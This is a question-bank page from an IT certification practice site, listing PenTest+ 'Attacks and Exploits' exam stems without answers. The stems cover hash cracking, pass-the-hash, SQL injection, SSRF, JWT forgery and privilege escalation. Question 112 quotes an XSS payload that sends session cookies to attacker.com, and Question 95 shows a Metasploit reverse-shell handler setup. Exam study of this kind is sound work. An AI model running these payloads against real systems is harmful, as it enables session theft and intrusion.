Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Free Resources

Difficulty IndexLearn — Free ChaptersIT GlossaryFree Tools & LabsStudy GuidesCareer RoadmapsBrowse by VendorCisco Command ReferenceCCNA Scenarios

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

← Attacks and Exploits practice sets

PT0-002 Attacks and Exploits • Complete Question Bank

PT0-002 Attacks and Exploits — All Questions With Answers

Complete PT0-002 Attacks and Exploits question bank — all 0 questions with answers and detailed explanations.

181
Questions
Free
No signup
Certifications/PT0-002/Practice Test/Attacks and Exploits/All Questions
Question 1mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?

Question 2easymultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, the tester discovers a parameter that reflects user input in the response without sanitization. Which type of vulnerability is most likely present?

Question 3hardmultiple choice
Read the full Attacks and Exploits explanation →

A tester wants to exploit a Windows service running with SYSTEM privileges that has an unquoted service path containing spaces. Which technique should be used to escalate privileges?

Question 4mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing a password attack on a Windows domain and has captured NTLM hashes. Which tool can be used to perform a pass-the-hash attack to gain remote code execution on a target system?

Question 5mediummultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

Question 6easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester needs to escalate privileges on a Linux system and finds that the current user can run a specific command with sudo without a password. Which tool should the tester consult to find known exploitation techniques for that command?

Question 7hardmultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is attempting to exploit a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application to access the cloud metadata service. Which IP address should the tester target?

Question 8mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

Question 9easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to crack NTLM hashes obtained from a Windows domain. Which hashcat mode should the tester use?

Question 10mediummultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?

Question 11hardmultiple choice
Review the full routing breakdown →

A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?

Question 12mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is exploiting a vulnerable web application and wants to perform a UNION-based SQL injection to extract data. Which condition is necessary for a successful UNION attack?

Question 13mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?

Question 14mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is testing a web application and wants to exploit an XXE vulnerability to read sensitive files. Which TWO payloads could be used?

Question 15hardmulti select
Read the full Attacks and Exploits explanation →

A penetration tester is performing lateral movement in a Windows domain after compromising a workstation. Which THREE techniques can be used to move to another machine?

Question 16easymultiple choice
Read the full Attacks and Exploits explanation →

During an internal penetration test, a tester wants to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic. Which tool should the tester use?

Question 17mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester has successfully compromised a Windows machine and wants to perform lateral movement to another machine using captured NTLM hashes. Which tool would allow the tester to pass the hash and execute commands remotely?

Question 18hardmultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester attempts to access the AWS metadata endpoint to retrieve temporary credentials. Which IP address is commonly used for the cloud metadata endpoint?

Question 19mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is exploiting a SQL injection vulnerability in a login page. The tester wants to extract data from another table without returning data in the original query. Which SQL injection technique should the tester use?

Question 20easymultiple choice
Read the full Attacks and Exploits explanation →

A tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should be used for NTLM hashes?

Question 21mediummultiple choice
Read the full Attacks and Exploits explanation →

During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?

Question 22hardmultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester discovers that the server does not validate the signature algorithm properly. Which attack should the tester attempt to forge a valid token?

Question 23easymultiple choice
Read the full Attacks and Exploits explanation →

Which Metasploit command is used to interact with an established session on a compromised host?

Question 24mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing a Cross-Site Request Forgery (CSRF) attack on a web application that uses SameSite cookies. Which SameSite attribute value is most likely to prevent the attack?

Question 25mediummultiple choice
Read the full Attacks and Exploits explanation →

During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?

Question 26hardmultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester has gained access to a Linux server and wants to move laterally to a Windows server. The tester captured a hash of a domain user. Which tool can be used to authenticate to the Windows server using the hash?

Question 27mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing a Kerberoasting attack. After requesting TGS tickets, which hashcat mode should be used to crack them?

Question 28mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?

Question 29hardmulti select
Read the full Attacks and Exploits explanation →

During a post-exploitation phase, a tester needs to establish persistence on a Windows target. Which THREE methods are commonly used for persistence on Windows?

Question 30mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is exploiting a web application and discovers an XML External Entity (XXE) vulnerability. Which TWO attacks can be performed using XXE?

Question 31easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is conducting a network attack and wants to intercept traffic between two hosts on the same local network by spoofing ARP responses. Which tool is specifically designed for this purpose?

Question 32mediummultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?

Question 33hardmultiple choice
Read the full Attacks and Exploits explanation →

After compromising a Linux host, you want to escalate privileges by exploiting a cron job that runs a script with root privileges. The script references an executable using a relative path. Which attack technique is most appropriate?

Question 34easymultiple choice
Read the full Attacks and Exploits explanation →

In a web application test, you find a parameter that directly references internal object IDs (e.g., user_id=123) and changing the ID allows access to another user's data. This vulnerability is known as:

Question 35mediummultiple choice
Read the full Attacks and Exploits explanation →

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

Question 36hardmultiple choice
Read the full Attacks and Exploits explanation →

You have obtained a NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?

Question 37mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is exploiting a SQL injection vulnerability in a web application. They want to extract data from the database without displaying it on the page. Which SQL injection technique should they use?

Question 38mediummultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, you discover a parameter that reflects user input in the response without proper encoding. You craft a payload that executes JavaScript in the victim's browser. This vulnerability is best classified as:

Question 39hardmultiple choice
Read the full Attacks and Exploits explanation →

You are attacking a web application and notice that it makes requests to internal services. You attempt to access the cloud metadata endpoint at http://169.254.169.254/. Which vulnerability are you most likely exploiting?

Question 40mediummultiple choice
Read the full Attacks and Exploits explanation →

After gaining initial access to a Windows host, you want to escalate privileges by exploiting a service that runs as SYSTEM but has an unquoted service path. What is the attack vector?

Question 41easymultiple choice
Read the full Attacks and Exploits explanation →

Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?

Question 42mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester needs to crack a large number of NTLM hashes. They have a wordlist and want to apply common password mutations. Which hashcat option enables the use of a rule file to mutate words?

Question 43mediummulti select
Read the full Attacks and Exploits explanation →

During a penetration test of a web application, you want to test for Cross-Site Request Forgery (CSRF) vulnerabilities. Which TWO conditions are necessary for a CSRF attack to succeed?

Question 44hardmulti select
Read the full Attacks and Exploits explanation →

You have gained a foothold on a Linux server and identified a SUID binary that can be exploited to read arbitrary files. Which THREE techniques could be used to escalate privileges or gather sensitive information?

Question 45mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?

Question 46mediummultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?

Question 47easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to perform a pass-the-hash attack on a Windows target. Which tools can be used for this purpose? (Choose the best answer.)

Question 48hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?

Question 49mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester needs to escalate privileges on a Linux system and finds that the user can run a script with sudo that has a vulnerable argument. Which resource should the tester consult to find exploitation techniques for common sudo misconfigurations?

Question 50mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester obtains a meterpreter session on a Windows target. Which command would the tester use to check the current user's privileges and potentially escalate privileges if SeImpersonatePrivilege is enabled?

Question 51easymultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should the tester use for NTLM hashes?

Question 52mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing a web application test and wants to exploit a SQL injection vulnerability to extract data from a database. The tester knows that the application returns results in the HTTP response. Which type of SQL injection is being used?

Question 53hardmultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester discovers a web application that fetches URLs from user input without proper validation. The tester targets the internal cloud metadata endpoint at 169.254.169.254 to retrieve instance credentials. Which type of attack is this?

Question 54easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?

Question 55mediummultiple choice
Read the full Attacks and Exploits explanation →

During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?

Question 56mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing an ARP spoofing attack using Bettercap to intercept traffic between a client and the gateway. What is the primary goal of this attack?

Question 57hardmultiple choice
Read the full Attacks and Exploits explanation →

A tester finds a Linux binary with the SUID bit set that is owned by root and can be executed by any user. The binary is known to have a vulnerability that allows arbitrary code execution. Which command does the tester use to find all SUID binaries on the system?

Question 58mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester has compromised a Linux server and wants to establish persistence. Which TWO of the following methods are commonly used for persistence on Linux?

Question 59hardmulti select
Read the full Attacks and Exploits explanation →

During a penetration test, a tester successfully exploits a web application and gains a foothold. The tester needs to pivot to an internal network segment that is not directly accessible. Which THREE tools can the tester use to create a SOCKS proxy or tunnel for pivoting?

Question 60mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is assessing an Active Directory environment and wants to perform Kerberoasting to obtain service account passwords. Which TWO conditions are required for a successful Kerberoasting attack?

Question 61easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing a network attack and wants to intercept traffic between two hosts on the same local network. Which technique should the tester use to redirect traffic through their machine?

Question 62mediummultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, the tester captured an NTLM hash using Responder and wants to pass the hash to gain access to a remote Windows system. Which tool would be most appropriate to perform a pass-the-hash attack?

Question 63mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing a SQL injection test on a web application. The tester sends the payload ' OR '1'='1 and receives the same response as with a normal request. However, when sending ' OR '1'='2, the response differs. Which type of SQL injection is most likely present?

Question 64hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

Question 65easymultiple choice
Read the full Attacks and Exploits explanation →

A tester has exploited a Linux system and gained a low-privilege shell. The tester runs 'sudo -l' and sees that the current user can run /usr/bin/find as root without a password. Which privilege escalation technique should the tester use?

Question 66mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing an NTLM relay attack against a Windows network. The tester uses ntlmrelayx to relay captured NTLM authentication attempts to a target server. What must be true for this attack to succeed?

Question 67mediummultiple choice
Read the full Attacks and Exploits explanation →

After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?

Question 68hardmultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, the tester discovers a Linux binary with the SUID bit set owned by root. The binary is a custom script that executes 'cp' to copy files. The tester can control the source file path via an environment variable. Which privilege escalation technique should the tester attempt?

Question 69easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to crack NTLM hashes captured during an internal test. Which hashcat mode should the tester use for NTLM hashes?

Question 70mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing a web application test and discovers a parameter that seems to reflect input in the response. The tester attempts a reflected XSS payload but the application filters script tags. Which XSS variant should the tester try next?

Question 71hardmultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?

Question 72mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing a Kerberoasting attack. After requesting TGS tickets for accounts with SPNs, what is the next step to obtain plaintext credentials?

Question 73mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is performing a web application test and identifies an endpoint that is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions can the tester perform using this vulnerability? (Choose TWO.)

Question 74hardmulti select
Read the full Attacks and Exploits explanation →

During a Windows privilege escalation attempt, a penetration tester discovers that the always elevated installation policy is enabled. Which of the following actions can the tester take to exploit this misconfiguration? (Choose TWO.)

Question 75mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is conducting a web application test and discovers an XML External Entity (XXE) vulnerability. Which of the following attacks can the tester perform using XXE? (Choose THREE.)

Question 76easymultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR and NBT-NS responses on the internal network. Which tool is most commonly used for this type of attack?

Question 77mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?

Question 78hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, the tester discovers a parameter that reflects user input in the response without proper encoding. The tester crafts a payload that executes JavaScript when another user views the page. Which type of XSS is this, and what is a primary risk?

Question 79mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester needs to crack NTLM hashes obtained from a Windows domain. The hashes are in the format used by Windows. Which hashcat mode should the tester use?

Question 80mediummultiple choice
Read the full Attacks and Exploits explanation →

While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?

Question 81easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?

Question 82mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester identifies a SQL injection vulnerability in a login form. The application responds with different error messages for valid and invalid queries. Which type of SQL injection is most likely present, and what tool could automate exploitation?

Question 83hardmultiple choice
Read the full Attacks and Exploits explanation →

During an internal penetration test, the tester wants to relay captured NTLM authentication to a server to gain access. Which tool from the Impacket suite is specifically designed for NTLM relay attacks?

Question 84mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester gains a shell on a Linux server and needs to pivot to an internal network. The tester's attack machine can reach the compromised server but not the internal network. Which tool can create a SOCKS proxy on the compromised server?

Question 85easymultiple choice
Read the full Attacks and Exploits explanation →

A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?

Question 86hardmultiple choice
Read the full Attacks and Exploits explanation →

A web application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a token and decodes it to find the header contains "alg":"none". What vulnerability does this indicate, and how can it be exploited?

Question 87mediummultiple choice
Read the full Attacks and Exploits explanation →

After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?

Question 88mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

Question 89mediummulti select
Read the full Attacks and Exploits explanation →

During a Windows privilege escalation attempt, the tester finds that the AlwaysInstallElevated registry key is set to 1. Which TWO actions can the tester perform to escalate privileges?

Question 90hardmulti select
Read the full Attacks and Exploits explanation →

A penetration tester has gained initial access to a Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for persistence on Linux systems?

Question 91easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester runs the following command: `hashcat -m 1000 -a 0 hashes.txt rockyou.txt`. What type of attack is being performed?

Question 92mediummultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester captures NTLM hashes using Responder. Which of the following techniques would allow the tester to authenticate to a remote server without cracking the password?

Question 93mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing a web application test and discovers that the application reflects user input in the response without proper sanitization. However, the tester notices that the input is handled client-side via JavaScript. Which type of XSS is this?

Question 94hardmultiple choice
Read the full Attacks and Exploits explanation →

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

Question 95mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester runs the following Metasploit commands: ``` msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 10.0.0.5 msf6 exploit(multi/handler) > set LPORT 4444 msf6 exploit(multi/handler) > run ``` What is the purpose of this configuration?

Question 96easymultiple choice
Read the full Attacks and Exploits explanation →

A tester wants to enumerate SMB shares and execute commands remotely on a Windows target using captured credentials. Which tool is most appropriate?

Question 97hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?

Question 98mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?

Question 99easymultiple choice
Read the full wireless explanation →

A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?

Question 100mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is exploiting a SQL injection vulnerability in a login form. The application returns different responses for valid and invalid queries. However, the tester cannot see the database output. Which type of SQL injection is most likely?

Question 101hardmultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester gains initial access to a Linux server and wants to pivot to an internal network that is not directly accessible. Which of the following tools is specifically designed for creating SOCKS proxies for pivoting?

Question 102mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing a web application test and finds an endpoint that accepts XML input. The tester sends a payload that includes an external entity referencing a local file. Which vulnerability is being tested?

Question 103mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is performing a full-scope engagement and needs to identify potential privilege escalation vectors on a Windows system. Which TWO of the following are valid Windows privilege escalation techniques?

Question 104mediummulti select
Read the full Attacks and Exploits explanation →

During a web application penetration test, a tester wants to identify vulnerabilities that allow unauthorized access to internal resources. Which TWO of the following are commonly exploited to access internal services?

Question 105hardmulti select
Read the full Attacks and Exploits explanation →

A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?

Question 106easymultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester runs the Responder tool on the internal network and captures an NTLMv2 hash. Which type of network attack is being performed?

Question 107easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?

Question 108mediummultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a JWT and changes the algorithm header to 'none' with an empty signature. Which attack is being attempted?

Question 109mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester gains a low-privilege shell on a Linux server. The command 'sudo -l' reveals that the user can run /usr/bin/less as root without a password. Which tool would the tester likely use to escalate privileges?

Question 110hardmultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?

Question 111mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?

Question 112mediummultiple choice
Read the full Attacks and Exploits explanation →

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like <script>document.location='http://attacker.com/?cookie='+document.cookie</script>. Which XSS type is this?

Question 113easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester wants to perform a pass-the-hash attack against a Windows system. Which tool can be used to authenticate using the NTLM hash instead of a password?

Question 114hardmultiple choice
Read the full Attacks and Exploits explanation →

During a post-exploitation phase, a tester has a foothold on a Linux server and wants to pivot to an internal web server that is not directly accessible. The tester has SSH access to the compromised server. Which command would create a local port forward to access the internal web server on port 80?

Question 115mediummultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing a Kerberoasting attack. After requesting TGS tickets from a domain controller, which tool would be used to crack the tickets offline?

Question 116hardmultiple choice
Read the full Attacks and Exploits explanation →

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

Question 117mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester finds that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester wants to access the cloud metadata endpoint to obtain instance credentials. Which IP address is commonly used for the cloud metadata service?

Question 118mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)

Question 119mediummulti select
Read the full Attacks and Exploits explanation →

During a web application penetration test, a tester identifies a SQL injection vulnerability. Which TWO techniques could be used to extract data from the database? (Select TWO.)

Question 120hardmulti select
Read the full Attacks and Exploits explanation →

A penetration tester has gained a foothold on a Linux server and wants to escalate privileges to root. Which THREE of the following are potential privilege escalation vectors? (Select THREE.)

Question 121mediummultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, a tester captures NTLMv2 hashes using Responder. The tester then uses ntlmrelayx to relay the captured hashes to a target server. Which of the following best describes this attack technique?

Question 122easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing an internal assessment and wants to intercept network traffic to capture credentials. Which tool is specifically designed for ARP spoofing and can also perform SSL stripping?

Question 123hardmultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?

Question 124mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is exploiting a web application and identifies a parameter that reflects user input in the response without sanitization. The tester wants to steal session cookies from other users. Which type of cross-site scripting (XSS) attack should the tester use?

Question 125easymultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is using Hashcat to crack NTLM hashes obtained from a Windows domain controller. Which hash mode should the tester specify for NTLM hashes?

Question 126mediummultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester attempts to modify the 'alg' header to 'none' and sends the token. The server accepts the forged token. Which vulnerability is being exploited?

Question 127hardmultiple choice
Read the full Attacks and Exploits explanation →

A penetration tester is performing an internal test and wants to move laterally from a compromised workstation to a domain controller. The tester has obtained NTLM hash for a domain admin. Which of the following tools would allow the tester to authenticate using the hash without cracking it?

Question 128mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester finds a Linux binary with the SUID bit set. The binary is owned by root and executes a shell command. The tester runs the binary and gets a root shell. Which command would the tester likely have used to discover this SUID binary?

Question 129easymultiple choice
Read the full Attacks and Exploits explanation →

A tester is performing an SQL injection attack on a login form. The tester inputs a single quote (') and receives a database error. The application returns different responses for true and false conditions. Which type of SQL injection is most likely occurring?

Question 130mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester is targeting a web application that makes server-side requests to internal resources based on user input. The tester attempts to access the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/. The request returns sensitive cloud credentials. Which vulnerability is being exploited?

Question 131hardmultiple choice
Study the full Python automation breakdown →

During a penetration test, a tester gains access to a Linux system and runs 'sudo -l', which reveals that the user can run /usr/bin/python with root privileges without a password. Which resource should the tester consult to find a method to escalate privileges using this configuration?

Question 132mediummultiple choice
Read the full Attacks and Exploits explanation →

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

Question 133mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester has obtained a meterpreter session on a Windows target. The tester wants to escalate privileges to SYSTEM and then dump password hashes. Which two meterpreter commands should the tester use in sequence? (Choose TWO.)

Question 134hardmulti select
Read the full Attacks and Exploits explanation →

A tester is performing a post-exploitation phase on a compromised Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for Linux persistence? (Choose THREE.)

Question 135mediummulti select
Read the full Attacks and Exploits explanation →

A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)

Question 136easymultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

Question 137mediummultiple choice
Read the full Attacks and Exploits explanation →

You have captured an NTLMv2 hash from a LLMNR poisoning attack using Responder. Which tool and mode would you use to attempt to crack the hash using a dictionary attack?

Question 138mediummultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

Question 139hardmultiple choice
Read the full Attacks and Exploits explanation →

In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?

Question 140easymultiple choice
Read the full Attacks and Exploits explanation →

Which SQL injection technique involves injecting a query that causes a delay in response, allowing the attacker to infer information based on response time?

Question 141mediummultiple choice
Review the full subnetting walkthrough →

After exploiting a Linux server, you need to pivot to a restricted network subnet. You have SSH access to the compromised server. Which command would create a SOCKS proxy on the server to route traffic through it?

Question 142mediummultiple choice
Read the full Attacks and Exploits explanation →

You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?

Question 143hardmultiple choice
Read the full Attacks and Exploits explanation →

During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?

Question 144easymultiple choice
Read the full Attacks and Exploits explanation →

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

Question 145mediummultiple choice
Read the full Attacks and Exploits explanation →

You are performing a password attack on a Linux system. You have obtained the /etc/shadow file. Which password cracking tool would be most efficient for a rule-based attack using a wordlist?

Question 146hardmultiple choice
Read the full Attacks and Exploits explanation →

During a web application test, you find a feature that allows users to export data as PDF. The PDF generation uses user input without sanitization. You inject an XML external entity that reads /etc/passwd and the content appears in the PDF. Which vulnerability is present?

Question 147mediummultiple choice
Read the full Attacks and Exploits explanation →

You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?

Question 148mediummulti select
Read the full Attacks and Exploits explanation →

You are enumerating a Linux system for privilege escalation vectors. Which TWO conditions below could be exploited to escalate privileges? (Select TWO.)

Question 149mediummulti select
